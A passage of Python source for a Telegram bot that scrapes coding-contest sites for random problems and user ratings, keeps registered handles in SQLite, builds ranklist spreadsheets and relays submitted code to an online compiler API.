CLIST_API_KEY = config.get('clist','api_key')
mount_point=config.get('openshift','persistent_mount_point')
compiler = helper.HackerRankAPI(api_key=HACKERRANK_API_KEY)
adminlist=str(config.get('telegram','admin_chat_id')).split(',')
# FOR CONVERSATION HANDLERS
NAME,JUDGE,HANDLE,SELECTION,HOLO,SOLO,POLO,XOLO,REMOVER,UPDA,QSELCC,LANG,CODE,DECODE,TESTCASES,RESULT,OTHER,FILE,FILETEST,GFG1,GFG2,GFG3,DB,CF,SCHED,REMNOTI,QSELCF,SUBSEL,SUBCC,SUBCF,UNSUB,MSG=range(32)
# CLASS FOR FLOOD PROTECTION
class Spam_settings:
def __init__(self):
self.limits = {1: 3, 5: 7, 10: 10, 15: 13, 30: 20} # max: 3 updates in 1 second, 7 updates in 5 seconds etc
self.timeout_start = 10
self.timeout_factor = 5
self.factors = {}
self.timeouts = {}
self.times = {}
def new_message(self, chat_id):
update_time = time.time()
if chat_id not in self.timeouts:
self.timeouts.update({chat_id: 0})
self.times.update({chat_id: [update_time]})
self.factors.update({chat_id: 1})
else:
if self.timeouts[chat_id] > update_time:
return self.timeouts[chat_id] - update_time
for limit in self.limits:
amount = 1
for n, upd_time in enumerate(self.times[chat_id]):
if update_time - upd_time < limit:
amount += 1
else:
if amount > self.limits[limit]:
self.timeouts[chat_id] = update_time + self.timeout_start * (self.factors[chat_id])
self.factors[chat_id] *= self.timeout_factor
text = "You are timeouted by the flood protection system of this bot. Try again in {0} seconds.".format(
self.timeouts[chat_id] - update_time)
return text
self.times[chat_id].insert(0, update_time)
return 0
def wrapper(self, func): # only works on functions, not on instancemethods
def func_wrapper(bot, update, *args2):
timeout = self.new_message(update.effective_chat.id)
if not timeout:
return func(bot, update, *args2)
elif isinstance(timeout, str):
print("timeout")
# Only works for messages (+Commands) and callback_queries (Inline Buttons)
if update.callback_query:
bot.edit_message_text(chat_id=update.effective_chat.id,
message_id=update.effective_message.message_id,
text=timeout)
elif update.message:
bot.send_message(chat_id=update.effective_chat.id, text=timeout)
return func_wrapper
timeouts = Spam_settings()
# CONNECTING TO SQLITE DATABASE AND CREATING TABLES
conn = sqlite3.connect(mount_point+'coders1.db')
create_table_request_list = [
'CREATE TABLE handles(id TEXT PRIMARY KEY,name TEXT,HE TEXT,HR TEXT,CF TEXT,SP TEXT,CC TEXT)',
'CREATE TABLE datas(id TEXT PRIMARY KEY,name TEXT,HE TEXT,HR TEXT,CF TEXT,SP TEXT,CC TEXT)',
'CREATE TABLE priority(id TEXT PRIMARY KEY,HE TEXT,HR TEXT,CF TEXT,CC TEXT)',
'CREATE TABLE subscribers(id TEXT PRIMARY KEY,CC int DEFAULT 0,CF int DEFAULT 0,CCSEL TEXT,CFSEL TEXT)',
]
for create_table_request in create_table_request_list:
try:
conn.execute(create_table_request)
except:
pass
conn.commit()
conn.close()
if os.path.exists(mount_point+'codeforces.json'):
with open(mount_point+'codeforces.json', 'r') as codeforces:
qcf = json.load(codeforces)
# GETTING QUESTIONS FROM CODECHEF WEBSITE
# STORING THEM ACCORDING TO THE TAG EASY,MEDIUM,HARD,BEGINNER,CHALLENGE
# STORING TITLE OF QUESTIONS AND THEIR CODE IN SEPERATE LISTS
i = 0
while (True):
# TRYING 5 TIMES AS SOMETIMES IT GIVES URL ERROR IN ONE GO
if i == 5:
break
try:
reqcce = urllib.request.Request("https://www.codechef.com/problems/easy/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
reqccs = urllib.request.Request("https://www.codechef.com/problems/school/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
reqccm = urllib.request.Request("https://www.codechef.com/problems/medium/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
reqcch = urllib.request.Request("https://www.codechef.com/problems/hard/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
reqccc = urllib.request.Request("https://www.codechef.com/problems/challenge/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
concce = urllib.request.urlopen(reqcce)
soupcce = bs.BeautifulSoup(concce, "html5lib")
scce = soupcce.find_all('div', {"class": "problemname"})
s1cce = soupcce.find_all('a', {"title": "Submit a solution to this problem."})
conccs = urllib.request.urlopen(reqccs)
soupccs = bs.BeautifulSoup(conccs, "html5lib")
sccs = soupccs.find_all('div', {"class": "problemname"})
s1ccs = soupccs.find_all('a', {"title": "Submit a solution to this problem."})
conccm = urllib.request.urlopen(reqccm)
soupccm = bs.BeautifulSoup(conccm, "html5lib")
sccm = soupccm.find_all('div', {"class": "problemname"})
s1ccm = soupccm.find_all('a', {"title": "Submit a solution to this problem."})
concch = urllib.request.urlopen(reqcch)
soupcch = bs.BeautifulSoup(concch, "html5lib")
scch = soupcch.find_all('div', {"class": "problemname"})
s1cch = soupcch.find_all('a', {"title": "Submit a solution to this problem."})
conccc = urllib.request.urlopen(reqccc)
soupccc = bs.BeautifulSoup(conccc, "html5lib")
sccc = soupccc.find_all('div', {"class": "problemname"})
s1ccc = soupccc.find_all('a', {"title": "Submit a solution to this problem."})
break
except urllib.error.URLError:
i = i + 1
continue
# COMMAND HANDLER FUNCTION FOR /start COMMAND
@timeouts.wrapper
def start(bot, update):
update.message.reply_text(
'welcome!\nOnly one person can register through one telegram id\nHere are the commands\nEnter /cancel at any time to cancel operation\nEnter /randomcc to get a random question from codechef\nEnter /randomcf to get a random question from codeforces\nEnter /geeksforgeeks to get topics from geeks for geeks\nEnter /register to go to register menu to register your handle to the bot\nEnter /unregister to go to unregister menu to unregister from the bot\nEnter /ranklist to go to ranklist menu to get ranklist\nEnter /ongoing to get a list of ongoing competitions\nEnter /upcoming to get a list of upcoming competitions\nEnter /compiler to compile and run\nEnter /subscribe to get question of the day everyday\nEnter /unsubscribe to unsubscribe from question of the day\nEnter /update to initialise updating of your info\n Automatic updation of all data will take place every day\n To see all the commands enter /help any time.\n\nORIGINAL CREATOR @gotham13121997\nORIGINAL source code https://github.com/Gotham13121997/superCodingBot')
# COMMAND HANDLER FUNCTION FOR /help COMMAND
@timeouts.wrapper
def help(bot, update):
update.message.reply_text(
'Only one person can register through one telegram id\nHere are the commands\nEnter /register to go to register menu to register your handle to the bot\nEnter /cancel at any time to cancel operation\nEnter /randomcc to get a random question from codechef\nEnter /randomcf to get a random question from codeforces\nEnter /geeksforgeeks to get topics from geeks for geeks\nEnter /unregister to go to unregister menu to unregister from the bot\nEnter /ranklist to go to ranklist menu to get ranklist\nEnter /ongoing to get a list of ongoing competitions\nEnter /upcoming to get a list of upcoming competitions\nEnter /compiler to compile and run\nEnter /subscribe to get question of the day everyday\nEnter /unsubscribe to unsubscribe from question of the day\nEnter /update to initialise updating of your info\n Automatic updation of all data will take place every day\n To see all the commands enter /help any time.\n\nORIGINAL CREATOR @gotham13121997\nORIGINAL source code https://github.com/Gotham13121997/superCodingBot')
# FUNCTION FOR LOGGING ALL KINDS OF ERRORS
def error(bot, update, error):
logger.warning('Update "%s" caused error "%s"' % (update, error))
# START OF CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODEFORCES
# FUNCTION TO GET INPUT ABOUT THE TYPE OF QUESTION FROM USER
@timeouts.wrapper
def randomcf(bot, update):
keyboard = [[InlineKeyboardButton("A", callback_data='Acf1'),
InlineKeyboardButton("B", callback_data='Bcf1'), InlineKeyboardButton("C", callback_data='Ccf1')],
[InlineKeyboardButton("D", callback_data='Dcf1'),
InlineKeyboardButton("E", callback_data='Ecf1'), InlineKeyboardButton("F", callback_data='Fcf1')],
[InlineKeyboardButton("OTHERS", callback_data='OTHERScf1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text('Please select the type of question', reply_markup=reply_markup)
return QSELCF
# FUNCTION FOR SENDING THE RANDOM QUESTION TO USER ACCORDING TO HIS CHOICE
def qselcf(bot, update):
query = update.callback_query
val = query.data
if val == 'Acf1':
n = random.randint(0, len(qcf['A']) - 1)
strn = qcf['A'][n]
elif val == 'Bcf1':
n = random.randint(0, len(qcf['B']) - 1)
strn = qcf['B'][n]
elif val == 'Ccf1':
n = random.randint(0, len(qcf['C']) - 1)
strn = qcf['C'][n]
elif val == 'Dcf1':
n = random.randint(0, len(qcf['D']) - 1)
strn = qcf['D'][n]
elif val == 'Ecf1':
n = random.randint(0, len(qcf['E']) - 1)
strn = qcf['E'][n]
elif val == 'Fcf1':
n = random.randint(0, len(qcf['F']) - 1)
strn = qcf['F'][n]
elif val=='OTHERScf1':
n = random.randint(0, len(qcf['OTHERS']) - 1)
strn = qcf['OTHERS'][n]
val=str(val).replace("cf1","")
bot.edit_message_text(
text="Random " + val + " question from codeforces\n\n" + strn,
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODEFORCES
# START OF CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODECHEF
# FUNCTION TO GET INPUT ABOUT THE TYPE OF QUESTION FROM USER
@timeouts.wrapper
def randomcc(bot, update):
keyboard = [[InlineKeyboardButton("Beginner", callback_data='BEGINNERcc1'),
InlineKeyboardButton("Easy", callback_data='EASYcc1')],
[InlineKeyboardButton("Medium", callback_data='MEDIUMcc1'),
InlineKeyboardButton("Hard", callback_data='HARDcc1')],
[InlineKeyboardButton("Challenge", callback_data='CHALLENGEcc1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text('Please select the type of question', reply_markup=reply_markup)
return QSELCC
# FUNCTION FOR SENDING THE RANDOM QUESTION TO USER ACCORDING TO HIS CHOICE
def qselcc(bot, update):
global scce, s1cce, scch, s1cch, sccm, s1ccm, sccs, s1ccs, sccc, s1ccc
query = update.callback_query
val = query.data
if val == 'BEGINNERcc1':
n = random.randint(0, len(sccs) - 1)
strt = sccs[n].text.strip("\n\n ")
strn = s1ccs[n].text
if val == 'EASYcc1':
n = random.randint(0, len(scce) - 1)
strt = scce[n].text.strip("\n\n ")
strn = s1cce[n].text
if val == 'MEDIUMcc1':
n = random.randint(0, len(sccm) - 1)
strt = sccm[n].text.strip("\n\n ")
strn = s1ccm[n].text
if val == 'HARDcc1':
n = random.randint(0, len(scch) - 1)
strt = scch[n].text.strip("\n\n ")
strn = s1cch[n].text
if val == 'CHALLENGEcc1':
n = random.randint(0, len(sccc) - 1)
strt = sccc[n].text.strip("\n\n ")
strn = s1ccc[n].text
val=str(val).replace("cc1","")
bot.edit_message_text(
text="Random " + val + " question from codechef\n\n" + strt + "\n" + "https://www.codechef.com/problems/" + strn,
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODECHEF
# START OF CONVERSATION HANDLER FOR REGISTERING THE USERS HANDLES
@timeouts.wrapper
def register(bot, update):
markup = ReplyKeyboardRemove()
update.message.reply_text('Hi,please enter your name ', reply_markup=markup)
return NAME
# FUNCTION FOR GETTING THE NAME AND ASKING ABOUT WHICH JUDGE USER WANTS TO REGISTER THEIR HANDLE FOR
def name(bot, update, user_data):
user_data['name'] = update.message.text.upper()
# THIS IS HOW AN INLINE KEYBOARD IS MADE AND USED
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HEreg1'),
InlineKeyboardButton("Hackerrank", callback_data='HRreg1')],
[InlineKeyboardButton("Codechef", callback_data='CCreg1'),
InlineKeyboardButton("Spoj", callback_data='SPreg1')],
[InlineKeyboardButton("Codeforces", callback_data='CFreg1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text('please enter the online judge you want to setup with the bot',
reply_markup=reply_markup)
return JUDGE
# FUNCTION FOR GETTING THE ONLINE JUDGE AND ASKING FOR HANDLE
def judge(bot, update, user_data):
# AND THIS IS HOW WE GET THE CALLBACK DATA WHEN INLINE KEYBOARD KEY IS PRESSED
query = update.callback_query
choices=['HEreg1','HRreg1','CFreg1','CCreg1','SPreg1']
if query.data not in choices:
return ConversationHandler.END
user_data['code'] = str(query.data).replace("reg1","")
bot.edit_message_text(text='please enter your handle eg. gotham13121997',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return HANDLE
# FUNCTION FOR GETTING THE HANDLE AND REGISTERING IT IN DATABASE
# ALL THE MAGIC BEGINS HERE
def handle(bot, update, user_data):
user = str(update.message.from_user.id)
handle1 = update.message.text
name1 = user_data['name']
code1 = user_data['code']
if code1 == 'HE':
# IF HACKEREARTH
opener = urllib.request.build_opener()
# SCRAPING DATA FROM WEBPAGE
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerearth.com/@' + handle1)
print('used')
soup = bs.BeautifulSoup(sauce, 'html5lib')
stri = "HACKEREARTH\n"
for i in soup.find_all('a', {"href": "/users/" + handle1 + "/activity/hackerearth/#user-rating-graph"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + handle1 + "/followers/"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + handle1 + "/following/"}):
stri = stri + i.text + "\n"
vals = stri
except urllib.error.URLError as e:
# IF URL NOT FOUND THE ID IS WRONG
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
elif code1 == 'HR':
# IF HACKERRANK
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerrank.com/' + handle1 + '?hr_r=1')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('script', {"id": "initialData"}).text
except AttributeError:
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
# I HAVE NO IDEA WHAT I HAVE DONE HERE
# BUT IT SEEMS TO WORK
s = soup.find('script', {"id": "initialData"}).text
i = s.find("hacker_id", s.find("hacker_id", s.find("hacker_id") + 1) + 1)
i = parse.unquote(s[i:i + 280]).replace(",", ">").replace(":", " ").replace("{", "").replace("}",
"").replace(
'"', "").split(">")
s1 = "HACKERRANK\n"
for j in range(1, 10):
s1 = s1 + i[j] + "\n"
vals = s1
except urllib.error.URLError as e:
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
elif code1 == 'CC':
# IF CODECHEF
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.codechef.com/users/' + handle1)
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('a', {"href": "http://www.codechef.com/ratings/all"}).text
except AttributeError:
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
try:
s1 = soup.find('span', {"class": "rating"}).text + "\n"
except AttributeError:
s1 = ""
s = "CODECHEF" + "\n" + s1 + "rating: " + soup.find('a', {
"href": "http://www.codechef.com/ratings/all"}).text + "\n" + soup.find('div', {
"class": "rating-ranks"}).text.replace(" ", "").replace("\n\n", "").strip('\n')
vals = s
except urllib.error.URLError as e:
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
elif code1 == 'SP':
# IF SPOJ
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://www.spoj.com/users/' + handle1 + '/')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('div', {"class": "col-md-3"}).text
except AttributeError:
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
s = soup.find('div', {"class": "col-md-3"}).text.strip('\n\n').replace("\t", "").split('\n')
s = s[3].strip().split(":")
s = "SPOJ\n" + s[0] + "\n" + s[1].strip(" ") + "\n" + soup.find('dl', {
"class": "dl-horizontal profile-info-data profile-info-data-stats"}).text.replace("\t", "").replace(
"\xa0", "").strip('\n')
vals = s
except urllib.error.URLError as e:
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
elif code1 == 'CF':
# IF CODEFORCES
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://codeforces.com/profile/' + handle1)
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).text
except AttributeError:
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
s = soup.find_all('span', {"style": "font-weight:bold;"})
if len(s) == 0:
s2 = ""
else:
s2 = "contest rating: " + s[0].text + "\n" + "max: " + s[1].text + s[2].text + "\n"
s1 = "CODEFORCES\n" + s2 + "contributions: " + soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).nextSibling.nextSibling.text
vals = s1
except urllib.error.URLError as e:
update.message.reply_text('wrong id')
user_data.clear()
return ConversationHandler.END
else:
return ConversationHandler.END
# CONNECTING TO DATABASE
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
# STORING THE PROFILE INFO IN datas TABLE
# STORING HANDLES IN handles TABLE
c.execute("INSERT OR IGNORE INTO datas (id, name, " + code1 + ") VALUES (?, ?, ?)", (user, name1, vals))
c.execute("INSERT OR IGNORE INTO handles (id, name, " + code1 + ") VALUES (?, ?, ?)", (user, name1, handle1))
if c.rowcount == 0:
c.execute("UPDATE datas SET " + code1 + " = (?) , name= (?) WHERE id = (?) ", (vals, name1, user))
c.execute("UPDATE handles SET " + code1 + " = (?) , name= (?) WHERE id = (?) ", (handle1, name1, user))
if code1=='HE':
try:
rat=vals.split('\n')
if(rat[1]=="Rating"):
rat2=rat[2].strip(" ").strip("\n")
c.execute("INSERT OR IGNORE INTO priority (id, HE) VALUES(?, ?)", (user, rat2))
if(c.rowcount==0):
c.execute("UPDATE priority SET HE = (?) WHERE id = (?) ", (rat2, user))
except:
pass
elif code1=='HR':
try:
rat=vals.split('\n')
rat2=rat[1].split(" ")[1].strip(" ").strip("\n")
c.execute("INSERT OR IGNORE INTO priority (id, HR) VALUES(?, ?)", (user, rat2))
if (c.rowcount == 0):
c.execute("UPDATE priority SET HR = (?) WHERE id = (?) ", (rat2, user))
except:
pass
elif code1=='CF':
try:
rat=vals.split("\n")
if "contest rating:"in rat[1]:
rat2=rat[1].split(" ")[2].strip(" ").strip("\n")
c.execute("INSERT OR IGNORE INTO priority (id, CF) VALUES(?, ?)", (user, rat2))
if (c.rowcount == 0):
c.execute("UPDATE priority SET CF = (?) WHERE id = (?) ", (rat2, user))
except:
pass
elif code1=='CC':
try:
rat=vals.split("\n")
if not "rating" in rat[1]:
rat2=rat[2].split(" ")[1].strip(" ").strip("\n")
c.execute("INSERT OR IGNORE INTO priority (id, CC) VALUES(?, ?)", (user, rat2))
if (c.rowcount == 0):
c.execute("UPDATE priority SET CC = (?) WHERE id = (?) ", (rat2, user))
except:
pass
elif code1=='SP':
c.execute("INSERT OR IGNORE INTO priority (id) VALUES(?)", (user,))
conn.commit()
# BELOW LINES ARE USED TO CREATE XLMX FILES OF ALL SORTS OF RANKLIST
# SO WHEN USER ASKS FOR RANKLIST THERE IS NO DELAY
workbook = Workbook(mount_point+'all.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT datas.name, datas.HE, datas.HR, datas.SP, datas.CF, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC, CAST(priority.CC AS FLOAT) DESC, CAST(priority.HR AS FLOAT) DESC, CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + code1 + ".xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
if(code1=='SP'):
mysel = c.execute("SELECT name, " + code1 + " FROM datas")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
else:
mysel = c.execute("SELECT datas.name, datas." + code1 + " FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority."+code1+" AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
conn.close()
update.message.reply_text("Succesfully Registered")
update.message.reply_text(name1 + " \n" + vals)
user_data.clear()
return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR REGISTERING THE USERS HANDLES
# START OF CONVERSATION HANDLER FOR COMPILING AND RUNNING
@timeouts.wrapper
def compilers(bot, update):
keyboard = [[InlineKeyboardButton("C++", callback_data='cppcomp1'),
InlineKeyboardButton("Python", callback_data='pythoncomp1')],
[InlineKeyboardButton("C", callback_data='ccomp1'),
InlineKeyboardButton("Java", callback_data='javacomp1')],
[InlineKeyboardButton("Python3", callback_data='python3comp1'),
InlineKeyboardButton("Java8", callback_data='java8comp1')],
[InlineKeyboardButton("Other", callback_data='othercomp1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text('Please select the language', reply_markup=reply_markup)
return LANG
# FUNCTION TO GET THE PROGRAMMING LANGUAGE
def lang(bot, update, user_data):
query = update.callback_query
val = query.data
val=str(val).replace("comp1","")
if val == "other":
# IF USER CHOOSES OTHER
s1 = ""
for i in compiler.supportedlanguages():
s1 = s1 + i + ","
bot.edit_message_text(text="enter the name of language\n" + s1, chat_id=query.message.chat_id,
message_id=query.message.message_id)
return OTHER
else:
# ELSE ASKING WETHER HE WANTS TO SEND SOURCE CODE OR A .TXT FILE
user_data['lang'] = val
keyboard = [[InlineKeyboardButton("Enter Source Code", callback_data='codeso1'),
InlineKeyboardButton("Send a .txt file", callback_data='fileso1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(text="please select", reply_markup=reply_markup, chat_id=query.message.chat_id,
message_id=query.message.message_id)
return CODE
# FUNCTION TO GET THE SOURCE CODE OR .TXT FILE AS INPUT
def code(bot, update, user_data):
query = update.callback_query
val = query.data
val=str(val).replace("so1","")
if val == "code":
bot.edit_message_text(text="please enter your code\nPlease make sure that the first line is not a comment line",
chat_id=query.message.chat_id, message_id=query.message.message_id)
return DECODE
elif val=="file":
bot.edit_message_text(text="please send your .txt file\nMaximum size 2mb", chat_id=query.message.chat_id,
message_id=query.message.message_id)
return FILE
else:
return ConversationHandler.END
# FUNCTION TO GET TESTCASE FILE
def filetest(bot, update, user_data):
file_id = update.message.document.file_id
file_id = update.message.document.file_id
file_size = update.message.document.file_size
if file_size > 2097152:
update.message.reply_text("FILE SIZE GREATER THAN 2 MB")
return ConversationHandler.END
newFile = bot.get_file(file_id)
newFile.download('test.txt')
with open('test.txt', 'rt') as f:
source = f.read()
s1 = (str(user_data['code'])).replace("«", "<<").replace("»", ">>")
result = compiler.run({'source': s1,
'lang': user_data['lang'],
'testcases': [source]
})
output = result.output
time1 = result.time
memory1 = result.memory
message1 = result.message
if time1 is not None:
time1 = time1[0]
if memory1 is not None:
memory1 = memory1[0]
if output is not None:
output = output[0]
else:
output = ""
markup = ReplyKeyboardRemove()
if (len(output) <= 2897):
update.message.reply_text("Output:\n" + str(output) + "\n" + "Time: " + str(time1) + "\nMemory: " + str(
memory1) + "\nMessage: " + str(message1), reply_markup=markup)
else:
with open("out.txt", "w") as text_file:
text_file.write("Output:\n" + str(output) + "\n" + "Time: " + str(time1) + "\nMemory: " + str(
memory1) + "\nMessage: " + str(message1))
bot.send_document(chat_id=update.message.chat_id, document=open('out.txt', 'rb'), reply_markup=markup)
os.remove('out.txt')
user_data.clear()
os.remove('test.txt')
return ConversationHandler.END
# FUNCTION TO DOWNLOAD THE FILE SENT AND EXTRACT ITS CONTENTS
def filer(bot, update, user_data):
file_id = update.message.document.file_id
file_size=update.message.document.file_size
if file_size > 2097152:
update.message.reply_text("FILE SIZE GREATER THAN 2 MB")
return ConversationHandler.END
newFile = bot.get_file(file_id)
newFile.download('abcd.txt')
with open('abcd.txt', 'r') as f:
source = f.read()
user_data['code'] = source
custom_keyboard = [['#no test case', '#send a .txt file']]
reply_markup = ReplyKeyboardMarkup(custom_keyboard, one_time_keyboard=True, resize_keybord=True)
update.message.reply_text(
'Please send test cases together as you would do in online ide\nIf you dont want to provide test cases select #no test case\n I you want to send test cases as .txt file select #send a .txt file',
reply_markup=reply_markup)
# REMOVING THE FILE AFTER PROCESS IS COMPLETE
os.remove('abcd.txt')
return TESTCASES
# FUNCTION TO GET THE SOURCE CODE SENT BY USER
def decode(bot, update, user_data):
user_data['code'] = update.message.text
custom_keyboard = [['#no test case', '#send a .txt file']]
reply_markup = ReplyKeyboardMarkup(custom_keyboard, one_time_keyboard=True, resize_keybord=True)
update.message.reply_text(
'Please send test cases together as you would do in online ide\nIf you dont want to provide test cases select #no test case\n I you want to send test cases as .txt file select #send a .txt file',
reply_markup=reply_markup)
return TESTCASES
# FUNCTION TO GET THE TEST CASES FROM THE USER
def testcases(bot, update, user_data):
s = update.message.text
markup = ReplyKeyboardRemove()
if s == "#send a .txt file":
update.message.reply_text("Please send your testcases as a .txt file\nMaximum size 2mb", reply_markup=markup)
return FILETEST
if s == "#no test case":
# CONVERTING UNICODE CHARACTER TO DOUBLE GREATER THAN OR LESS THAN
# WEIRD
s1 = (str(user_data['code'])).replace("«", "<<").replace("»", ">>")
# USING COMPILER FUNCTION FROM helper.py script
result = compiler.run({'source': s1,
'lang': user_data['lang']
})
# GETTING OUTPUT FROM result CLASS in helper.py script
output = result.output
time1 = result.time
memory1 = result.memory
message1 = result.message
if time1 is not None:
time1 = time1[0]
if memory1 is not None:
memory1 = memory1[0]
if output is not None:
output = output[0]
else:
output = ""
if (len(output) <= 2897):
update.message.reply_text("Output:\n" + str(output) + "\n" + "Time: " + str(time1) + "\nMemory: " + str(
memory1) + "\nMessage: " + str(message1), reply_markup=markup)
else:
with open("out.txt", "w") as text_file:
text_file.write("Output:\n" + str(output) + "\n" + "Time: " + str(time1) + "\nMemory: " + str(
memory1) + "\nMessage: " + str(message1))
bot.send_document(chat_id=update.message.chat_id, document=open('out.txt', 'rb'), reply_markup=markup)
os.remove('out.txt')
else:
# AGAIN THE SAME DRILL
s1 = (str(user_data['code'])).replace("«", "<<").replace("»", ">>")
result = compiler.run({'source': s1,
'lang': user_data['lang'],
'testcases': [s]
})
output = result.output
time1 = result.time
memory1 = result.memory
message1 = result.message
if time1 is not None:
time1 = time1[0]
if memory1 is not None:
memory1 = memory1[0]
if output is not None:
output = output[0]
else:
output = ""
if (len(output) <= 2897):
update.message.reply_text("Output:\n" + str(output) + "\n" + "Time: " + str(time1) + "\nMemory: " + str(
memory1) + "\nMessage: " + str(message1), reply_markup=markup)
else:
with open("out.txt", "w") as text_file:
text_file.write("Output:\n" + str(output) + "\n" + "Time: " + str(time1) + "\nMemory: " + str(
memory1) + "\nMessage: " + str(message1))
bot.send_document(chat_id=update.message.chat_id, document=open('out.txt', 'rb'), reply_markup=markup)
os.remove('out.txt')
user_data.clear()
return ConversationHandler.END
# FUNCTION FOR THE CASE WHERE USER HAD SELECTED OTHER
def other(bot, update, user_data):
s = update.message.text
user_data['lang'] = s
keyboard = [[InlineKeyboardButton("Enter Source Code", callback_data='code'),
InlineKeyboardButton("Send a file", callback_data='file')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("please select", reply_markup=reply_markup)
return CODE
# END OF CONVERSATION HANDLER FOR COMPILING AND RUNNING
# START OF CONVERSATION HANDLER FOR GEEKS FOR GEEKS
@timeouts.wrapper
def gfg(bot, update):
keyboard = [[InlineKeyboardButton("ALGORITHMS", callback_data='Algorithmsgfg1'),
InlineKeyboardButton("DATA STRUCTURES", callback_data='DSgfg1')],
[InlineKeyboardButton("GATE", callback_data='GATEgfg1'),
InlineKeyboardButton("INTERVIEW", callback_data='Interviewgfg1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("please select", reply_markup=reply_markup)
return GFG1
# FUNCTION TO SHOW SUBMENU 1
def gfg1(bot, update, user_data):
query = update.callback_query
val = query.data
val=str(val).replace("gfg1","")
val=val+".json"
user_data['gfg'] = val
if (val == "Algorithms.json"):
keyboard = [[InlineKeyboardButton("Analysis of Algorithms", callback_data='Analysis of Algorithmsgfg2'),
InlineKeyboardButton("Searching and Sorting", callback_data='Searching and Sortinggfg2')],
[InlineKeyboardButton("Greedy Algorithms", callback_data='Greedy Algorithmsgfg2'),
InlineKeyboardButton("Dynamic Programming", callback_data='Dynamic Programminggfg2')],
[InlineKeyboardButton("Strings and Pattern Searching",
callback_data='Strings and Pattern Searchinggfg2'),
InlineKeyboardButton("Backtracking", callback_data='Backtrackinggfg2')],
[InlineKeyboardButton("Geometric Algorithms", callback_data='Geometric Algorithmsgfg2'),
InlineKeyboardButton("Mathematical Algorithms", callback_data='Mathematical Algorithmsgfg2')],
[InlineKeyboardButton("Bit Algorithms", callback_data='Bit Algorithmsgfg2'),
InlineKeyboardButton("Randomized Algorithms", callback_data='Randomized Algorithmsgfg2')],
[InlineKeyboardButton("Misc Algorithms", callback_data='Misc Algorithmsgfg2'),
InlineKeyboardButton("Recursion", callback_data='Recursiongfg2')],
[InlineKeyboardButton("Divide and Conquer", callback_data='Divide and Conquergfg2')]]
elif (val == "DS.json"):
